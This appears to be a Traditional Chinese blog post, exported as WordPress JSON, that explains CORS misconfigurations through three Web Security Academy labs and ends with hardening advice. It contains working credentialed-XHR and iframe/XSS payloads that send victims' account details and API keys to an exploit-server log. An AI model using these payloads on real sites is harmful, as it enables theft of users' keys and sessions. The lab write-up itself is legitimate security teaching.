CORS\uff08Cross-Origin Resource Sharing\uff09\u7684\u57fa\u672c\u539f\u7406\u662f\uff0c\u7db2\u7ad9\u4f3a\u670d\u5668\u7522\u751f\u8a2a\u554f\u63a7\u5236\u7b56\u7565\uff0c\u8981\u6c42\u4f7f\u7528\u8005\u700f\u89bd\u5668\u653e\u5becSOP\uff08\u540c\u6e90\u653f\u7b56\uff09\u7684\u9650\u5236\u3002\u56e0\u70ba\u5728\u9ed8\u8a8d\u7684SOP\u4e0b\uff0c\u524d\u5f8c\u7aef\u958b\u767c\u6703\u975e\u5e38\u96e3\u4ee5\u9032\u884c\uff0c\u4e5f\u6c92\u8fa6\u6cd5\u7528 XHR \u7684\u65b9\u5f0f\u5957\u7528\u5176\u4ed6 SDK \u7684 API\u3002\u4e5f\u56e0\u6b64\u51fa\u73fe\u4e86 CORS \u7684\u6a5f\u5236\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
SOP\uff08Same Origin Policy,\u540c\u6e90\u7b56\u7565\uff09\u662f Web \u6700\u91cd\u8981\u7684\u5b89\u5168\u6a5f\u5236\uff0c\u5b83\u78ba\u4fdd\u4e86\u4e0d\u540c\u6e90\uff08Origin\uff0c\u5305\u62ec\u57df\u540d\uff0c\u7aef\u53e3\u548c\u5354\u8b70\u985e\u578b\uff09\u7684 Web \u61c9\u7528\u4e4b\u9593\u4e0d\u80fd\u4e92\u76f8\u5e72\u64fe\u3002<\/p>\n\n\n\n
\u4f8b\u5b50\uff1a
\u4e0d\u540c\u5354\u5b9a\uff1a\u5982\u679c\u6587\u4ef61\u4f86\u81eahttp:\/\/systw.net\uff0c\u800c\u6587\u4ef62\u4f86\u81ea\u65bchttps:\/\/systw.net\uff0chttp\u548chttps\u662f\u4e0d\u540c\u5354\u5b9a\u6240\u4ee5\u4e0d\u662f\u540c\u6e90
\u4e0d\u540c\u57df\u540d\uff1a\u50cf\u662fhttps:\/\/api.systw.net \u8ddf https:\/\/app.systw.net\u3002\u56e0\u70ba\u5b83\u5011\u7684 host \u4e0d\u540c\uff0c\u6240\u4ee5\u4e5f\u4e0d\u7b97\u540c\u6e90<\/p>\n\n\n\n
SOP\u9ed8\u8a8d\u963b\u6b62\u8de8\u57df\u8b80\u53d6\u97ff\u61c9\u5167\u5bb9\u3002\u5728\u540c\u6e90\u7b56\u7565\u7684\u9650\u5236\u4e0b\uff0c\u5ba2\u6236\u7aef\u8173\u672c\u53ef\u4ee5\u901a\u904e\u8cc7\u6e90\u5f15\u7528\u6216\u8005\u8de8\u57df\u8868\u55ae\u63d0\u4ea4\u5411\u7b2c\u4e09\u65b9\u4f3a\u670d\u5668\u767c\u9001GET\u8acb\u6c42\u548cPOST\u8acb\u6c42\uff0c\u4f46\u662f\u537b\u4e0d\u80fd\u8b80\u53d6\u97ff\u61c9\u5167\u5bb9\u3002\u4f46\u662f\u4e5f\u6709\u4e00\u4e9b\u4f8b\u5916\uff0c\u4e0d\u53d7\u540c\u6e90\u7b56\u7565\u5f71\u97ff\u7684\u8cc7\u6e90\u5982\u4e0b<\/p>\n\n\n\n
<\/p>\n\n\n\n
CORS\u662fXHR(XMLHttpRequest) V2 \u6a19\u6e96\u4e0b\u898f\u5b9a\u7684\u8de8\u7ad9\u9ede\u8cc7\u6e90\u5171\u4eab\u7684\u65b9\u5f0f\u3002\u5b83\u898f\u5b9a\u4e86\u700f\u89bd\u5668\u5728\u901a\u904eXHR\u8acb\u6c42\u8de8\u57df\u8cc7\u6e90\u7684\u6642\u5019\u7684\u884c\u70ba\u898f\u7bc4\u3002\u670d\u52d9\u7aef\u8acb\u6c42\u982d\u914d\u7f6e\u932f\u8aa4\u7684\u6642\u5019\u6703\u5c0e\u81f4\u5b89\u5168\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\u5c0d\u7db2\u7ad9\u767c\u9001\uff2frigin\u8acb\u6c42\u5f8c\uff0c\u53ef\u6839\u64da\u4ee5\u4e0b\u8fd4\u56de\u5167\u5bb9\u5224\u65b7\u7db2\u7ad9\u662f\u5426\u5b89\u5168<\/p>\n\n\n\n
\u5e38\u898b\u7684\u5b89\u5168\u554f\u984c\u6709\u4ee5\u4e0b3\u7a2e<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5c0d\u7db2\u7ad9\u8acb\u6c42Origin\u5404\u7a2e\u57df\u540d\uff0cAccess-Control-Allow-Origin\u90fd\u6703\u5141\u8a31\uff0c\u8868\u793a\u7db2\u7ad9\u53ef\u5141\u8a31\u5404\u7a2e\u4f86\u6e90\u7684\u8de8\u57df\u5b58\u53d6\uff0c\u63db\u53e5\u8a71\u8aaa\u9019\u4e5f\u5141\u8a31\u653b\u64ca\u8005\u7684\u7db2\u9801<\/p>\n\n\n\n
\u4f8b\u5982<\/p>\n\n\n\n
\u5c0d\u7db2\u7ad9Origin\u9001\u51fa\u4efb\u4f55domain\uff0c\u50cf\u662fhttps:\/\/example.com<\/p>\n\n\n\n
\r\tGET \/accountDetails HTTP\/1.1\r\n\tHost: 0ab800bc0405bd04c0b6634200ee0070.web-security-academy.net\r\n\tCookie: session=dP8ECM8u6q3yqSpmNimhbG6jj5W2fdpd\r\n\tOrigin: https:\/\/example.com\r\n\t...omit...\r\n\r<\/code><\/pre>\n\n\n\n\u8fd4\u56de\u6642\u51fa\u73fe\u4ee5\u4e0b\uff0c\u9019\u8868\u793a\u8a72\u7db2\u7ad9\u5141\u8a31\u5b58\u53d6\u5176\u4ed6\u4efb\u4f55\u7db2\u7ad9\u7684\u8cc7\u6e90\uff0c\u800c\u4e14\u4e5f\u5145\u8a31\u8de8\u57dfCOOKIE\u7684\u4f7f\u7528<\/p>\n\n\n\n
\tHTTP\/1.1 200 OK\r\n\tAccess-Control-Allow-Origin: https:\/\/example.com\r\n\tAccess-Control-Allow-Credentials: true\r\n\t...omit...\r\n\t{\r\n\t \"username\": \"wiener\",\r\n\t \"email\": \"\",\r\n\t \"apikey\": \"VV4TchuQnAFlpMJU3ZXMZwmbnBvlPiGJ\",\r\n\t \"sessions\": [\r\n\t \"dP8ECM8u6q3yqSpmNimhbG6jj5W2fdpd\"\r\n\t ]\r\n\t}<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u7531\u65bcCORS\u592a\u5bec\u9b06\uff0c\u53ea\u8981\u6e96\u5099\u4e00\u53f0\u653b\u64ca\u4e3b\u6a5f\u986f\u793a\u4ee5\u4e0b\u653b\u64ca\u9801\u9762\uff0c\u5728\u8b93\u53d7\u5bb3\u8005\u8a2a\u554f\uff0c\u700f\u89bd\u5668\u5c31\u80fd\u9032\u884c\u8de8\u57df\u5b58\u53d6\u57f7\u884c\u60e1\u610f\u4ee3\u78bc <\/p>\n\n\n\n
<script>\r\n var req = new XMLHttpRequest();\r\n req.onload = reqListener;\r\n req.open('get','https:\/\/0ab800bc0405bd04c0b6634200ee0070.web-security-academy.net\/accountDetails',true);\r\n req.withCredentials = true;\r\n req.send();\r\n\r\n function reqListener() {\r\n location='\/log?key='+this.responseText;\r\n };\r\n<\/script><\/code><\/pre>\n\n\n\n\u53d7\u5bb3\u8005\u8a2a\u554f\u653b\u64ca\u8005\u7684\u7db2\u9801\u5f8c\uff0c\u653b\u64ca\u8005\u5c31\u80fd\u5728\u653b\u64ca\u4e3b\u6a5f\u7684web\u65e5\u5fd7\u8a18\u9304log?key=\u770b\u5230apikey<\/p>\n\n\n\n
<\/p>\n\n\n\n
refer
lab: CORS vulnerability with basic origin reflection<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
2.\u5141\u8a31\u700f\u89bd\u5668\u5b58\u53d6\u7a7a\u767d\u4f86\u6e90<\/h2>\n\n\n\n
\u7db2\u7ad9\u914d\u7f6e\u4e0d\u7576\uff0c\u4fe1\u4efb\u7a7a\u767d\u4f86\u6e90\uff0c\u53d7\u5bb3\u8005\u4e00\u4f46\u57f7\u884c\u653b\u64ca\u8005\u88fd\u4f5c\u7684\u7a7a\u767d\u4f86\u6e90\u653b\u64ca\u7db2\u9801\uff0c\u5c31\u6703\u57f7\u884c\u4ee3\u78bc\u4e0a\u7684\u8de8\u57df\u653b\u64ca<\/p>\n\n\n\n
\u4f8b\u5982<\/p>\n\n\n\n
\u5c0d\u7db2\u7ad9\u9001\u51faOrigin: null <\/p>\n\n\n\n
\tGET \/accountDetails HTTP\/1.1\n\tHost: 0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\n\tOrigin: null\n\t...omit...<\/code><\/pre>\n\n\n\n\u5982\u679c\u8fd4\u56de\u6642\u51fa\u73fe\u4ee5\u4e0b\uff0c\u9019\u8868\u793a\u8a72\u7db2\u7ad9\u5141\u8a31\u7a7a\u767d\u4f86\u6e90\uff0c\u5b58\u5728\u5b89\u5168\u554f\u984c<\/p>\n\n\n\n
\tHTTP\/1.1 200 OK\r\n\tAccess-Control-Allow-Origin: null\r\n\tAccess-Control-Allow-Credentials: true\r\n\t...omit...\n\t\"apikey\": \"VV4TchuQnAFlpMJU3ZXMZwmbnBvlPiGJ\",\n\t...omit...<\/code><\/pre>\n\n\n\n\u53ea\u8981\u88fd\u4f5c\u53ef\u7522\u751f\u7a7a\u767d\u4f86\u6e90\u7684\u653b\u64ca\u9801\u9762\uff0c\u53d7\u5bb3\u8005\u958b\u555f\u5f8c\u5c31\u80fd\u6210\u529f\u57f7\u884c\u3002<\/p>\n\n\n\n
\u50cf\u662fiframe\u6c99\u7bb1\u5c31\u53ef\u7522\u751f\u7a7a\u767d\u4f86\u6e90\u8acb\u6c42\uff0c\u5982\u4e0b<\/p>\n\n\n\n
<iframe sandbox=\"allow-scripts allow-top-navigation allow-forms\" srcdoc=\"<script>\r\n var req = new XMLHttpRequest();\r\n req.onload = reqListener;\r\n req.open('get','YOUR-LAB-ID.web-security-academy.net\/accountDetails',true);\r\n req.withCredentials = true;\r\n req.send();\r\n function reqListener() {\r\n location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net\/log?key='+encodeURIComponent(this.responseText);\r\n };\r\n<\/script>\"><\/iframe><\/code><\/pre>\n\n\n\n\u53d7\u5bb3\u8005\u8a2a\u554f\u5f8c\uff0c\u653b\u64ca\u8005\u5c31\u80fd\u5728\u653b\u64ca\u4e3b\u6a5f\u7684web\u65e5\u5fd7\u8a18\u9304log?key=\u770b\u5230apikey<\/p>\n\n\n\n
<\/p>\n\n\n\n
refer
lab: CORS vulnerability with trusted null origin<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
3.\u5141\u8a31\u700f\u89bd\u5668\u5b58\u53d6\u4efb\u610f\u5b50\u7db2\u57df<\/h2>\n\n\n\n
\u5982\u679c\u7db2\u7ad9\u914d\u7f6e\u5141\u8a31\u4efb\u610f\u5b50\u7db2\u57df\u80fd\u8de8\u57df\u5b58\u53d6\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u5728\u6709xss\u554f\u984c\u7684\u5b50\u7db2\u57df\u4f48\u597d\u653b\u64ca\u9801\u9762\uff0c\u4e00\u4f46\u53d7\u5bb3\u8005\u8a2a\u554f\u8a72\u9801\u9762\u5247\u6703\u57f7\u884c\u60e1\u610f\u4ee3\u78bc<\/p>\n\n\n\n
\u4f8b\u5982
\u5c0d\u7db2\u7ad9\u96a8\u4fbf\u63d0\u51fa\u4e00\u500b\u5b50\u57df\u540d\uff0c\u50cf\u662fsubdomaintest\u5982\u4e0b<\/p>\n\n\n\n
\tGET \/accountDetails HTTP\/1.1\r\n\tHost: 0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\r\n\tOrigin: https:\/\/subdomaintest.0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\r\n\t...omit...<\/code><\/pre>\n\n\n\n\u8fd4\u56de\u5167\u5bb9\u53ef\u770b\u5230\u5df1\u540c\u610fsubdomaintest\u8de8\u57df\u8acb\u6c42\uff0c\u4ee3\u8868Origin\u9001\u51fa\u4efb\u4f55\u5b50\u57df\u540d\u7db2\u7ad9\u90fd\u540c\u610f\uff0c\u7db2\u7ad9\u5141\u8a31\u4efb\u4f55\u5b50\u7db2\u57df\u8de8\u57df<\/p>\n\n\n\n
\tHTTP\/1.1 200 OK\r\n\tAccess-Control-Allow-Origin: https:\/\/subdomaintest.0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\r\n\tAccess-Control-Allow-Credentials: true\r\n\t...omit...<\/code><\/pre>\n\n\n\n\u5982\u679c\u8981\u5229\u7528\u8a72\u554f\u984c\u653b\u64ca\uff0c\u653b\u64ca\u8005\u9084\u5fc5\u9808\u5728\u5b50\u7db2\u57df\u4e0b\u627e\u5230XSS\u6f0f\u6d1e\uff0c\u624d\u53ef\u900f\u904e\u5b50\u57df\u540d\u5e36\u60e1\u610f\u4ee3\u78bc\u8b93\u700f\u89bd\u5668\u57f7\u884c<\/p>\n\n\n\n
\u5728\u9019\u500b\u6848\u4f8b\u4e2d\uff0c\u76ee\u6a19\u7db2\u7ad9\u5b58\u5728XSS\u6f0f\u6d1e\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n
\tGET \/?productId=1<script>alert(1)<\/script>&storeId=1\r\n\tHost: stock.0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\r\n\t...omit...<\/code><\/pre>\n\n\n\n\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u8a72XSS\u6f0f\u6d1e\u57f7\u884c\u4ee5\u4e0b\u4ee3\u78bc\uff0c\u53d6\u5f97apikey<\/p>\n\n\n\n
<script>\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https:\/\/0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\/accountDetails',true); \nreq.withCredentials = true;req.send();\nfunction reqListener() {\n location='https:\/\/exploit-0aae00c5032c3f65c0f21726016a00fd.exploit-server.net\/log?key='%2bthis.responseText; \n};\n<\/script><\/code><\/pre>\n\n\n\n\u5c07\u4e0a\u8ff0\u4ee3\u78bc\u5305\u9032xss\u4e2d\uff0c\u6700\u5f8c\u8981\u8b93\u53d7\u5bb3\u8005\u57f7\u884c\u7684\u653b\u64ca\u7db2\u9801\u5982\u4e0b\uff0c\u9019\u53ef\u4ee5\u7b26\u5408cors\u8981\u6c42\uff0c\u5141\u8a31\u4efb\u4f55\u5b50\u57df\u540d\u8de8\u57df\u5b58\u53d6<\/p>\n\n\n\n
<script>\r\n document.location=\"http:\/\/stock.0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https:\/\/0a6c00d0030f3f12c005183b009d0079.web-security-academy.net\/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https:\/\/exploit-0aae00c5032c3f65c0f21726016a00fd.exploit-server.net\/log?key='%2bthis.responseText; };%3c\/script>&storeId=1\"\r\n<\/script><\/code><\/pre>\n\n\n\n\u53d7\u5bb3\u8005\u8a2a\u554f\u5f8c\uff0c\u653b\u64ca\u8005\u5c31\u80fd\u5728\u653b\u64ca\u4e3b\u6a5f\u7684web\u65e5\u5fd7\u8a18\u9304log?key=\u770b\u5230apikey<\/p>\n\n\n\n
<\/p>\n\n\n\n
refer
Lab: CORS vulnerability with trusted insecure protocols<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u7db2\u7ad9\u914d\u7f6eCORS\u7684\u5b89\u5168\u5efa\u8b70<\/h2>\n\n\n\n\n- \u4e0d\u8981\u76f2\u76ee\u53cd\u5c04 Origin <\/li>\n\n\n\n
- \u56b4\u683c\u6821\u9a57 Origin \uff0c\u907f\u514d\u51fa\u73fe\u6b0a\u9650\u6d29\u6f0f<\/li>\n\n\n\n
- \u4e0d\u8981\u914d\u7f6e Access-Control-Allow-Origin: null<\/li>\n\n\n\n
- HTTPS \u7db2\u7ad9\u4e0d\u8981\u4fe1\u4efb HTTP \u57df<\/li>\n\n\n\n
- \u4e0d\u8981\u4fe1\u4efb\u5168\u90e8\u81ea\u8eab\u5b50\u57df\uff0c\u6e1b\u5c11\u653b\u64ca\u9762<\/li>\n\n\n\n
- \u4e0d\u8981\u914d\u7f6e Origin:* \u548c Credentials: true<\/li>\n\n\n\n
- \u589e\u52a0 Vary: Origin <\/li>\n<\/ol>\n\n\n\n
<\/p>\n\n\n\n
refer
https:\/\/www.cnblogs.com\/zhaijiahui\/p\/14626370.html
https:\/\/www.bedefended.com\/papers\/cors-security-guide
https:\/\/www.freebuf.com\/articles\/web\/290140.html
https:\/\/research.qianxin.com\/archives\/290<\/p>\n","protected":false},"excerpt":{"rendered":"
CORS\uff08Cross-Origin Resource Sha …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-1105","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1105"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1105\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}